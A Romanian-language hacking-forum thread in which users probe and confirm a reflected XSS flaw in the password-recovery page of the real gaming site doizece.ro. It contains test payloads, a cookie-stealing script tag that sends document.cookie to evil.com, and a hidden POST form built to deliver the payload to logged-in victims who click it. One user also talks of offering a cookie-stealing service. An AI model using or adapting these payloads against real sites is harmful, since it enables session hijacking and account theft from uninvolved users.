[?]WWW.doizece.ro

[iuly1997]

Am gasit ceva pe Joaca acum! Doizece.ro - Poker, Whist, Rentz, Rummy si multe alte jocuri multiplayer.. dar nu sunt sigur ce este.. este XSS sau ce este??

PROOF:

Este vreo vulnerabilitate sau ma insel?

[dekeeu]

Probabil este un xss.

[iuly1997]

cred ca o sa dau report.... dar tot nu sunt sigur ce este

[dekeeu]

1. Nu mai folosi Acunetix, ca nu inveti nimic.

2. Din cate vad acolo ai putut sa inchizi tagul mai devreme , deci probabil poti injecta si javascript macar intr-un atribut.

3. Bun, sa zicem ca il raportezi , cum trimiti e-mailul ? Ii intrebi pe cei din echipa tehnica ce ai gasit ?

[iuly1997]

Sunt incepator deci.. ) mai am de invatat, folosesc acunetix doar daca nu reusesc sa gasesc nimic... mai am de invatat

[dekeeu]

Incearca sa injectezi : 'onmouseover='alert(1) sau '/><script>alert(0)</script> sa vezi daca nu sare alertul .

[iuly1997]

Nu sare alertu, dar la '/><script>alert(0)</script> se inchide tagu mai devreme

Vulnerabilitatea este la http://www.doizece.ro/account/password-recovery

Cine vrea sa incerce.. si sa imi spuna si mie ce gaseste

[dancezar]

'><script>alert(1)</script> la mine functioneaza

[wHoIS]

Pe vulpe(firefox) sare dar pe Chrome nu.

[iuly1997]

Da, si la mine sare alertu pe mozilla firefox(inainte foloseam chrome)

Cum ar putea fi exploatat acest XSS ? sunt curios

[dancezar]

'><script>document.location="http://evil.com/script.php?c="+document.cookie;</script>

http://evil.com/script.php inregistreaza acel paramtru c intr-un fisier sau intr-o baza de date c find cookieurile victimei

[kalash1337]

Da, si la mine sare alertu pe mozilla firefox(inainte foloseam chrome)

Cum ar putea fi exploatat acest XSS ? sunt curios

Dai search inainte sa intrebi ceva?

[yo20063]

Sper ca nu o sa le trimiti vectorul cu numele meu!

[asasinulmortii]

1. acelui script ii mai trebuie un parametru cu fisierul (probabil voi face un serviciu online de steal cookies pentru toti)

2. tu furi cookieurile cui ? ale tale?

[dancezar]

1. acelui script ii mai trebuie un parametru cu fisierul (probabil voi face un serviciu online de steal cookies pentru toti)

2. tu furi cookieurile cui ? ale tale?

Defapt merge exploatat in felul asta:

<form action="http://www.doizece.ro/account/password-recovery" method="POST">
<input type="hidden" name="email" value="'><script>alert(1)</script>" />
<input type="hidden" name="submit" value="Trimite" />
<input type="submit" value="XSS Click Here" />
</form>

Codul HTML il stochezi pe un site,in inputul email se afla vectorul xss care v-a fi trimis pe pagina lor.Daca victima da click pe acel buton vectorul xss v-a fi trimis pe pagina doizece si executat:)

[asasinulmortii]

Asta daca userul care da click este logat

Pacat ca nu e shtml ca atunci ramaneau astia fara site